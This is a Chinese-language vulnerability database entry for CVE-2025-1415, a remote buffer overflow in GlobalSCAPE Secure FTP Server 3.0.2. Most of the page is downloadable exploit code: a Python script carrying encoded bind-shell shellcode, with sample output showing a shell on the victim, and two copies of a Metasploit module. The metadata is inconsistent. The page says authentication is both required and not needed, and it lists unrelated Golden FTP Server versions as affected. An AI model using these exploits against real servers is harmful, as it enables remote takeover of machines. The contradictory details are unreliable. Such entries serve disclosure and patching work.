CVE-2005-1415
CVSS10.0
发布时间 :2005-05-03 00:00:00
修订时间 :2008-09-05 16:49:05
NMCOEPS    

[原文]Buffer overflow in GlobalSCAPE Secure FTP Server 3.0.2 allows remote authenticated users to execute arbitrary code via a long FTP command.


[CNNVD]GlobalSCAPE Secure FTP Server远程溢出漏洞(CNNVD-200505-866)

        GlobalSCAPE Secure FTP Server是一款灵活可靠的FTP服务程序。
        GlobalSCAPE Secure FTP Server存在远程缓冲区溢出漏洞,远程攻击者可以利用这个漏洞执行任意指令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:globalscape:secure_ftp_server:3.0.2
cpe:/a:globalscape:secure_ftp_server:3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1415
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1415
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-866
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/13454
(PATCH)  BID  13454
http://www.cuteftp.com/gsftps/history.asp
(PATCH)  CONFIRM  http://www.cuteftp.com/gsftps/history.asp
http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html
(UNKNOWN)  FULLDISC  20050501 Remote buffer overflow in GlobalScape Secure FTP server 3.0.2

- 漏洞信息

GlobalSCAPE Secure FTP Server远程溢出漏洞
危急 缓冲区溢出
2005-05-03 00:00:00 2005-10-20 00:00:00
远程  
        GlobalSCAPE Secure FTP Server是一款灵活可靠的FTP服务程序。
        GlobalSCAPE Secure FTP Server存在远程缓冲区溢出漏洞,远程攻击者可以利用这个漏洞执行任意指令。

- 公告与补丁

        暂无数据

- 漏洞信息 (975)

GlobalScape Secure FTP Server 3.0 Buffer Overflow Exploit (EDBID:975)
windows remote
2005-05-01 Verified
21 muts
[点击下载] [点击下载]
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by mati@see-security.com
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
# [+] Sending Username
# [+] Sending Password
# [+] Sending evil buffer
# [+] Connect to port 4444 on victim Machine!
#
# root@[muts]# nc -v 192.168.1.153 4444
# [192.168.1.153] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>

import socket
import struct
import time

# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum 
# http://metasploit.com */

sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
sc +="\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
sc +="\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
sc +="\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
sc +="\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
sc +="\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
sc +="\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
sc +="\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
sc +="\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
sc +="\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
sc +="\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
sc +="\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
sc +="\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
sc +="\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
sc +="\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
sc +="\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
sc +="\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
sc +="\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
sc +="\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
sc +="\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
sc +="\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
sc +="\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
sc +="\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
sc +="\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
sc +="\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
sc +="\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
sc +="\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
sc +="\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
sc +="\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
sc +="\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
sc +="\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
sc +="\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
sc +="\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
sc +="\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
sc +="\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
sc +="\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
sc +="\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
sc +="\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
sc +="\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
sc +="\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a"

buffer = '\x41'*2043+ struct.pack("<L",0x7C4FEDBB)+'\x90'*36+sc
try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	print "\n[+] Evil GlobalFTP 3.0 Secure Server Exploit"
	print "[+] Coded by muts"
	connect=s.connect(('192.168.1.153',21))
	d=s.recv(1024)
	print "[+] " +d
	print "[+] Sending Username"
	time.sleep(1)
	s.send('USER muts\r\n')
	s.recv(1024)
	print "[+] Sending Password"
	time.sleep(1)
	s.send('PASS muts\r\n')
	s.recv(1024)
	print "[+] Sending evil buffer"
	time.sleep(1)
	s.send(buffer+'r\n')
	print "[+] Connect to port 4444 on victim Machine!\n"
except:
	print "Can't connect to ftp"

# milw0rm.com [2005-05-01]
		

- 漏洞信息 (16703)

GlobalSCAPE Secure FTP Server Input Overflow (EDBID:16703)
windows remote
2010-10-05 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: globalscapeftp_input.rb 10559 2010-10-05 23:41:17Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'GlobalSCAPE Secure FTP Server Input Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.
				All versions prior to 3.0.3 are affected by this flaw. A valid user account (
				or anonymous access) is required for this exploit to work.
			},
			'Author'         => [ 'Fairuzan Roslan <riaf [at] mysec.org>', 'Mati Aharoni <mati [at] see-security.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10559 $',
			'References'     =>
				[
					[ 'CVE', '2005-1415'],
					[ 'OSVDB', '16049'],
					[ 'BID', '13454'],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x20" + (0x61..0x7a).to_a.pack('C*'),
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
				},
			'Platform'       => [ 'win' ],
			'Targets'        =>
				[
					[
						'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal',
						{
							'Ret'      => 0x1002f01f,
						},
					],
				],
			'DisclosureDate' => 'May 1 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect_login

		buf           = make_nops(3047)
		buf[2043, 4]  = [ target.ret ].pack('V')
		buf[2047, payload.encoded.length] = payload.encoded

		send_cmd( [buf] )

		handler
		disconnect
	end

end
		

- 漏洞信息 (F82955)

GlobalSCAPE Secure FTP Server Input Overflow (PacketStormID:F82955)
2009-11-26 00:00:00
Mati Aharoni,riaf  metasploit.com
exploit,overflow
CVE-2005-1415
[点击下载]

This Metasploit module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account ( or anonymous access) is required for this exploit to work.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'GlobalSCAPE Secure FTP Server Input Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. 
				All versions prior to 3.0.3 are affected by this flaw. A valid user account (
				or anonymous access) is required for this exploit to work.		
			},
			'Author'         => [ 'Fairuzan Roslan <riaf [at] mysec.org>', 'Mati Aharoni <mati [at] see-security.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1415'],
					[ 'OSVDB', '16049'],
					[ 'BID', '13454'],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x20\x61\x62\x63\x64\x65\x66\x67\x68\x69" +
					              "\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74" +
								  "\x75\x76\x77\x78\x79\x7a",
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",

				},
			'Targets'        => 
				[
					[
						'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal',
						{
							'Platform' => 'win',
							'Ret'      => 0x1002f01f,
						},
					],
				],
			'DisclosureDate' => 'May 1 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect_login

		buf           = make_nops(3047)
		buf[2043, 4]  = [ target.ret ].pack('V')
		buf[2047, payload.encoded.length] = payload.encoded
		
		send_cmd( [buf] )
		
		handler
		disconnect
	end

end
    

- 漏洞信息

16049
GlobalSCAPE Secure FTP Server (gsftps) Command Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in GlobalSCAPE Secure FTP Server. The Secure FTP Server fails to perform adequate bounds checking of user-supplied input resulting in a buffer overflow. With a specially crafted request in the format "[3000 Bytes] \r\n" , an attacker can overwrite the EIP and SEH registers and execute arbitrary code on the system, resulting in a loss of integrity.

- 时间线

2005-05-01 Unknow
2005-05-01 Unknow

- 解决方案

Upgrade to version 3.0.3 Build 4.29.2005 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

GlobalSCAPE Secure FTP Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 13454
Yes No
2005-05-02 12:00:00 2009-11-26 09:45:00
"muts" <muts@whitehat.co.il> disclosed this vulnerability.

- 受影响的程序版本

KMiNT21 Software Golden FTP Server 2.0 2b
KMiNT21 Software Golden FTP Server 1.31 b
KMiNT21 Software Golden FTP Server 1.30 b
KMiNT21 Software Golden FTP Server 1.20 b
KMiNT21 Software Golden FTP Server 1.0 0b
globalSCAPE Secure FTP Server 3.0.2 Build 04.12.2005.1
globalSCAPE Secure FTP Server 3.0
KMiNT21 Software Golden FTP Server 2.0 5b

- 不受影响的程序版本

KMiNT21 Software Golden FTP Server 2.0 5b

- 漏洞讨论

GlobalSCAPE Secure FTP Server is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Exploiting this issue allows remote attackers to execute arbitrary machine code in the context of the vulnerable server.

- 漏洞利用

Proof-of-concept exploits have been provided by &lt;mati@see-security.com&gt;.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A Metasploit exploit module is available.

- 解决方案

This issue is addressed in Secure FTP Server 3.0.3.


globalSCAPE Secure FTP Server 3.0

globalSCAPE Secure FTP Server 3.0.2 Build 04.12.2005.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站